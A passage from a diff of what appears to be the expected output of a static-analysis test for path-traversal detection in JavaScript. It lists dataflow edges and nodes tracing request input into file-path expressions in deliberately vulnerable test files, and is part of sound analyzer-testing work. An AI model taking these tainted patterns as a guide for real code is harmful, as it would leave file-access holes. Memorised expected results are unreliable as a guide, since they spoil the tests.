provenance | Config | +| TaintedPath.js:128:7:128:38 | concatted | TaintedPath.js:129:19:129:27 | concatted | provenance | | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | TaintedPath.js:128:7:128:38 | concatted | provenance | | +| TaintedPath.js:128:33:128:37 | split | TaintedPath.js:128:19:128:38 | prefix.concat(split) | provenance | Config | +| TaintedPath.js:129:19:129:27 | concatted | TaintedPath.js:129:19:129:37 | concatted.join("/") | provenance | Config | +| TaintedPath.js:131:7:131:39 | concatted2 | TaintedPath.js:132:19:132:28 | concatted2 | provenance | | +| TaintedPath.js:131:20:131:24 | split | TaintedPath.js:131:20:131:39 | split.concat(prefix) | provenance | Config | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | TaintedPath.js:131:7:131:39 | concatted2 | provenance | | +| TaintedPath.js:132:19:132:28 | concatted2 | TaintedPath.js:132:19:132:38 | concatted2.join("/") | provenance | Config | +| TaintedPath.js:134:19:134:23 | split | TaintedPath.js:134:19:134:29 | split.pop() | provenance | Config | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:143:29:143:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:149:29:149:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:150:29:150:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:151:29:151:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:152:29:152:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:167:40:167:43 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:168:50:168:53 | path | provenance | | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | TaintedPath.js:139:14:139:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | TaintedPath.js:139:14:139:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | TaintedPath.js:139:7:139:48 | path | provenance | | +| TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:139:14:139:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:143:29:143:32 | path | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:149:29:149:32 | path | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:150:29:150:32 | path | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:151:29:151:32 | path | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:152:29:152:32 | path | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:167:40:167:43 | path | TaintedPath.js:167:40:167:73 | path.re ... +/, '') | provenance | Config | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | provenance | Config | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | provenance | Config | +| TaintedPath.js:168:50:168:53 | path | TaintedPath.js:168:29:168:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | provenance | Config | +| TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:45 | qs.parse(req.url) | provenance | Config | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | provenance | Config | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | provenance | Config | +| TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:38:177:58 | normali ... eq.url) | provenance | Config | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | provenance | Config | +| TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | provenance | Config | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:185:31:185:34 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:186:45:186:48 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:187:35:187:38 | path | provenance | | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | TaintedPath.js:184:14:184:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | TaintedPath.js:184:14:184:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | TaintedPath.js:184:7:184:48 | path | provenance | | +| TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:184:14:184:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:191:7:191:48 | path | TaintedPath.js:195:29:195:32 | path | provenance | | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | TaintedPath.js:191:14:191:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | TaintedPath.js:191:14:191:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | TaintedPath.js:191:7:191:48 | path | provenance | | +| TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:191:14:191:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:195:29:195:32 | path | TaintedPath.js:195:29:195:85 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:202:29:202:32 | path | provenance | | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:205:31:205:34 | path | provenance | | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | TaintedPath.js:200:14:200:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | TaintedPath.js:200:14:200:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | TaintedPath.js:200:7:200:48 | path | provenance | | +| TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:200:14:200:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:202:29:202:32 | path | TaintedPath.js:202:29:202:68 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:205:31:205:34 | path | TaintedPath.js:205:31:205:69 | path.re ... '), '') | provenance | Config | +| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:10:36:10:43 | filePath | provenance | | | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | provenance | Config | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | provenance | Config | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | examples/TaintedPath.js:8:7:8:52 | filePath | provenance | | | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | provenance | Config | -| examples/TaintedPath.js:11:36:11:43 | filePath | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | provenance | Config | +| examples/TaintedPath.js:10:36:10:43 | filePath | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | provenance | Config | | handlebars.js:10:51:10:58 | filePath | handlebars.js:11:32:11:39 | filePath | provenance | | | handlebars.js:13:73:13:80 | filePath | handlebars.js:15:25:15:32 | filePath | provenance | | | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:10:51:10:58 | filePath | provenance | | @@ -899,10 +569,10 @@ edges | tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | tainted-promise-steps.js:11:19:11:35 | await pathPromise | provenance | | | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | tainted-promise-steps.js:12:20:12:23 | path | provenance | | | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | -| tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | provenance | Config | -| tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | +| tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | @@ -944,205 +614,535 @@ edges | torrents.js:6:6:6:45 | loc | torrents.js:7:25:7:27 | loc | provenance | | | torrents.js:6:12:6:45 | dir + " ... t.data" | torrents.js:6:6:6:45 | loc | provenance | | | torrents.js:6:24:6:27 | name | torrents.js:6:12:6:45 | dir + " ... t.data" | provenance | Config | -| typescript.ts:9:7:9:48 | path | typescript.ts:12:29:12:32 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:20:15:20:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:23:15:23:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:30:15:30:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:11:29:11:32 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:19:15:19:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:22:15:22:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:29:15:29:18 | path | provenance | | | typescript.ts:9:14:9:37 | url.par ... , true) | typescript.ts:9:14:9:43 | url.par ... ).query | provenance | Config | | typescript.ts:9:14:9:43 | url.par ... ).query | typescript.ts:9:14:9:48 | url.par ... ry.path | provenance | Config | | typescript.ts:9:14:9:48 | url.par ... ry.path | typescript.ts:9:7:9:48 | path | provenance | | | typescript.ts:9:24:9:30 | req.url | typescript.ts:9:14:9:37 | url.par ... , true) | provenance | Config | -| typescript.ts:20:7:20:18 | path3 | typescript.ts:21:39:21:43 | path3 | provenance | | -| typescript.ts:20:15:20:18 | path | typescript.ts:20:7:20:18 | path3 | provenance | | -| typescript.ts:23:7:23:18 | path4 | typescript.ts:24:39:24:43 | path4 | provenance | | -| typescript.ts:23:15:23:18 | path | typescript.ts:23:7:23:18 | path4 | provenance | | -| typescript.ts:30:7:30:18 | path6 | typescript.ts:32:29:32:33 | path6 | provenance | | -| typescript.ts:30:15:30:18 | path | typescript.ts:30:7:30:18 | path6 | provenance | | +| typescript.ts:19:7:19:18 | path3 | typescript.ts:20:39:20:43 | path3 | provenance | | +| typescript.ts:19:15:19:18 | path | typescript.ts:19:7:19:18 | path3 | provenance | | +| typescript.ts:22:7:22:18 | path4 | typescript.ts:23:39:23:43 | path4 | provenance | | +| typescript.ts:22:15:22:18 | path | typescript.ts:22:7:22:18 | path4 | provenance | | +| typescript.ts:29:7:29:18 | path6 | typescript.ts:31:29:31:33 | path6 | provenance | | +| typescript.ts:29:15:29:18 | path | typescript.ts:29:7:29:18 | path6 | provenance | | +nodes +| TaintedPath-es6.js:7:7:7:44 | path | semmle.label | path | +| TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | semmle.label | parse(req.url, true) | +| TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | +| TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | +| TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | semmle.label | join("public", path) | +| TaintedPath-es6.js:9:41:9:44 | path | semmle.label | path | +| TaintedPath.js:9:7:9:48 | path | semmle.label | path | +| TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | +| TaintedPath.js:11:29:11:32 | path | semmle.label | path | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | +| TaintedPath.js:13:45:13:48 | path | semmle.label | path | +| TaintedPath.js:16:33:16:36 | path | semmle.label | path | +| TaintedPath.js:19:33:19:36 | path | semmle.label | path | +| TaintedPath.js:22:33:22:36 | path | semmle.label | path | +| TaintedPath.js:31:31:31:34 | path | semmle.label | path | +| TaintedPath.js:36:3:36:44 | path | semmle.label | path | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:36:20:36:26 | req.url | semmle.label | req.url | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:39:48:39:51 | path | semmle.label | path | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | +| TaintedPath.js:42:45:42:48 | path | semmle.label | path | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:43:51:43:54 | path | semmle.label | path | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:44:50:44:53 | path | semmle.label | path | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| TaintedPath.js:45:52:45:55 | path | semmle.label | path | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | +| TaintedPath.js:46:49:46:52 | path | semmle.label | path | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:47:48:47:51 | path | semmle.label | path | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:48:54:48:57 | path | semmle.label | path | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | +| TaintedPath.js:49:57:49:60 | path | semmle.label | path | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:54:31:54:76 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:54:63:54:69 | req.url | semmle.label | req.url | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:55:31:55:74 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:55:61:55:67 | req.url | semmle.label | req.url | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:56:31:56:73 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:56:60:56:66 | req.url | semmle.label | req.url | +| TaintedPath.js:64:48:64:60 | req.params[0] | semmle.label | req.params[0] | +| TaintedPath.js:73:6:73:47 | path | semmle.label | path | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:73:23:73:29 | req.url | semmle.label | req.url | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | +| TaintedPath.js:75:44:75:47 | path | semmle.label | path | +| TaintedPath.js:76:14:76:17 | path | semmle.label | path | +| TaintedPath.js:77:32:77:39 | realpath | semmle.label | realpath | +| TaintedPath.js:78:45:78:52 | realpath | semmle.label | realpath | +| TaintedPath.js:109:6:109:47 | path | semmle.label | path | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:109:23:109:29 | req.url | semmle.label | req.url | +| TaintedPath.js:111:23:111:26 | path | semmle.label | path | +| TaintedPath.js:115:7:115:48 | path | semmle.label | path | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:115:24:115:30 | req.url | semmle.label | req.url | +| TaintedPath.js:117:19:117:22 | path | semmle.label | path | +| TaintedPath.js:119:7:119:29 | split | semmle.label | split | +| TaintedPath.js:119:15:119:18 | path | semmle.label | path | +| TaintedPath.js:119:15:119:29 | path.split("/") | semmle.label | path.split("/") | +| TaintedPath.js:121:19:121:23 | split | semmle.label | split | +| TaintedPath.js:121:19:121:33 | split.join("/") | semmle.label | split.join("/") | +| TaintedPath.js:125:19:125:23 | split | semmle.label | split | +| TaintedPath.js:125:19:125:26 | split[x] | semmle.label | split[x] | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | semmle.label | prefix + split[x] | +| TaintedPath.js:126:28:126:32 | split | semmle.label | split | +| TaintedPath.js:126:28:126:35 | split[x] | semmle.label | split[x] | +| TaintedPath.js:128:7:128:38 | concatted | semmle.label | concatted | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | +| TaintedPath.js:128:33:128:37 | split | semmle.label | split | +| TaintedPath.js:129:19:129:27 | concatted | semmle.label | concatted | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | semmle.label | concatted.join("/") | +| TaintedPath.js:131:7:131:39 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:131:20:131:24 | split | semmle.label | split | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | +| TaintedPath.js:132:19:132:28 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | +| TaintedPath.js:134:19:134:23 | split | semmle.label | split | +| TaintedPath.js:134:19:134:29 | split.pop() | semmle.label | split.pop() | +| TaintedPath.js:139:7:139:48 | path | semmle.label | path | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:139:24:139:30 | req.url | semmle.label | req.url | +| TaintedPath.js:143:29:143:32 | path | semmle.label | path | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:149:29:149:32 | path | semmle.label | path | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:150:29:150:32 | path | semmle.label | path | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:151:29:151:32 | path | semmle.label | path | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:152:29:152:32 | path | semmle.label | path | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | +| TaintedPath.js:167:40:167:43 | path | semmle.label | path | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | +| TaintedPath.js:168:50:168:53 | path | semmle.label | path | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | +| TaintedPath.js:176:38:176:44 | req.url | semmle.label | req.url | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... l)).foo | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | +| TaintedPath.js:177:51:177:57 | req.url | semmle.label | req.url | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | +| TaintedPath.js:179:44:179:50 | req.url | semmle.label | req.url | +| TaintedPath.js:184:7:184:48 | path | semmle.label | path | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:184:24:184:30 | req.url | semmle.label | req.url | +| TaintedPath.js:185:31:185:34 | path | semmle.label | path | +| TaintedPath.js:186:45:186:48 | path | semmle.label | path | +| TaintedPath.js:187:35:187:38 | path | semmle.label | path | +| TaintedPath.js:191:7:191:48 | path | semmle.label | path | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:191:24:191:30 | req.url | semmle.label | req.url | +| TaintedPath.js:195:29:195:32 | path | semmle.label | path | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:200:7:200:48 | path | semmle.label | path | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:200:24:200:30 | req.url | semmle.label | req.url | +| TaintedPath.js:202:29:202:32 | path | semmle.label | path | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:205:31:205:34 | path | semmle.label | path | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | +| examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | +| examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | +| examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | semmle.label | ROOT + filePath | +| examples/TaintedPath.js:10:36:10:43 | filePath | semmle.label | filePath | +| express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | +| handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | +| handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | +| handlebars.js:13:73:13:80 | filePath | semmle.label | filePath | +| handlebars.js:15:25:15:32 | filePath | semmle.label | filePath | +| handlebars.js:29:46:29:60 | req.params.path | semmle.label | req.params.path | +| handlebars.js:43:15:43:29 | req.params.path | semmle.label | req.params.path | +| normalizedPaths.js:11:7:11:27 | path | semmle.label | path | +| normalizedPaths.js:11:14:11:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:13:19:13:22 | path | semmle.label | path | +| normalizedPaths.js:14:19:14:29 | './' + path | semmle.label | './' + path | +| normalizedPaths.js:14:26:14:29 | path | semmle.label | path | +| normalizedPaths.js:15:19:15:22 | path | semmle.label | path | +| normalizedPaths.js:15:19:15:38 | path + '/index.html' | semmle.label | path + '/index.html' | +| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:16:35:16:38 | path | semmle.label | path | +| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:17:53:17:56 | path | semmle.label | path | +| normalizedPaths.js:21:7:21:49 | path | semmle.label | path | +| normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:21:35:21:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:23:19:23:22 | path | semmle.label | path | +| normalizedPaths.js:24:19:24:29 | './' + path | semmle.label | './' + path | +| normalizedPaths.js:24:26:24:29 | path | semmle.label | path | +| normalizedPaths.js:25:19:25:22 | path | semmle.label | path | +| normalizedPaths.js:25:19:25:38 | path + '/index.html' | semmle.label | path + '/index.html' | +| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:26:35:26:38 | path | semmle.label | path | +| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| normalizedPaths.js:27:53:27:56 | path | semmle.label | path | +| normalizedPaths.js:31:7:31:49 | path | semmle.label | path | +| normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:31:35:31:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:36:19:36:22 | path | semmle.label | path | +| normalizedPaths.js:41:21:41:24 | path | semmle.label | path | +| normalizedPaths.js:54:7:54:49 | path | semmle.label | path | +| normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:54:35:54:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:59:19:59:22 | path | semmle.label | path | +| normalizedPaths.js:63:19:63:22 | path | semmle.label | path | +| normalizedPaths.js:63:19:63:38 | path + "/index.html" | semmle.label | path + "/index.html" | +| normalizedPaths.js:68:21:68:24 | path | semmle.label | path | +| normalizedPaths.js:73:7:73:56 | path | semmle.label | path | +| normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:73:35:73:55 | './' + ... ry.path | semmle.label | './' + ... ry.path | +| normalizedPaths.js:73:42:73:55 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:78:22:78:25 | path | semmle.label | path | +| normalizedPaths.js:82:7:82:27 | path | semmle.label | path | +| normalizedPaths.js:82:14:82:27 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:87:29:87:32 | path | semmle.label | path | +| normalizedPaths.js:90:31:90:34 | path | semmle.label | path | +| normalizedPaths.js:94:7:94:49 | path | semmle.label | path | +| normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:94:35:94:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:99:29:99:32 | path | semmle.label | path | +| normalizedPaths.js:117:7:117:44 | path | semmle.label | path | +| normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | semmle.label | fs.real ... y.path) | +| normalizedPaths.js:117:30:117:43 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:119:19:119:22 | path | semmle.label | path | +| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | +| normalizedPaths.js:120:35:120:38 | path | semmle.label | path | +| normalizedPaths.js:130:7:130:49 | path | semmle.label | path | +| normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:130:35:130:48 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:135:21:135:24 | path | semmle.label | path | +| normalizedPaths.js:139:7:139:62 | path | semmle.label | path | +| normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:139:48:139:61 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:144:21:144:24 | path | semmle.label | path | +| normalizedPaths.js:148:7:148:58 | path | semmle.label | path | +| normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | semmle.label | 'foo/' ... y.path) | +| normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | +| normalizedPaths.js:148:44:148:57 | req.query.path | semmle.label | req.query.path | +| normalizedPaths.js:151:21:151:24 | path | semmle.label | path | +| normalizedPaths.js:153:21:153:24 | path | semmle.label | path | +| normalizedPaths.js:160:7:160:49 | path | semmle.label | path | +| normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | semmle.label | 